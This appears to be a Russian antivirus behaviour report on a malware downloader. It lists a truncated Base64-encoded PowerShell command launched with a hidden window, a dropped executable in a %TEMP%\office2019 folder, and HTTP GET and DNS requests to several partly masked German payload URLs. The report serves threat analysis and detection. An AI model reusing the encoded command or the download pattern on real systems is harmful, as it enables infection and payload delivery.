Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZADIAaABsAG0AZQBtAD0AKAAnAEkAdwB6AGEAeAAnACsAJwB6ACcAKwAnAGMAJwApADsAJgAoACcAbgBlAHcAJwArACcALQBpAHQAJwArACcAZQBtACcAKQAgACQAZQBOAHYAOgBUAGUATQBwAFwATwBmAGYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AG...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\office2019\kst21p7ps.exe
Удаляет следующие файлы
- %TEMP%\office2019\kst21p7ps.exe
Подменяет следующие файлы
- %TEMP%\office2019\kst21p7ps.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://je####reiberg.de/cgi-bin/F/
- http://da###ickdoof.de/cgi-bin/hts/
- http://be#####er-schweiz.de/assets/1v/
- http://br###ammer.de/cgi-bin/d/
- http://bs####uservice.de/anfrage/FZM/
- http://ja##a.de/cgi-bin/x4/
- http://m-###sken.de/cgi-bin/fgV/
UDP
- DNS ASK je####reiberg.de
- DNS ASK da###ickdoof.de
- DNS ASK be#####er-schweiz.de
- DNS ASK br###ammer.de
- DNS ASK bs####uservice.de
- DNS ASK ja##a.de
- DNS ASK m-###sken.de
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZADIAaABsAG0AZQBtAD0AKAAnAEkAdwB6AGEAeAAnACsAJwB6ACcAKwAnAGMAJwApADsAJgAoACcAbgBlAHcAJwArACcALQBpAHQAJwArACcAZQBtACcAKQAgACQAZQBOAHYAOgBUAGUATQBwAFwATwBmAGYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AG...' (со скрытым окном)
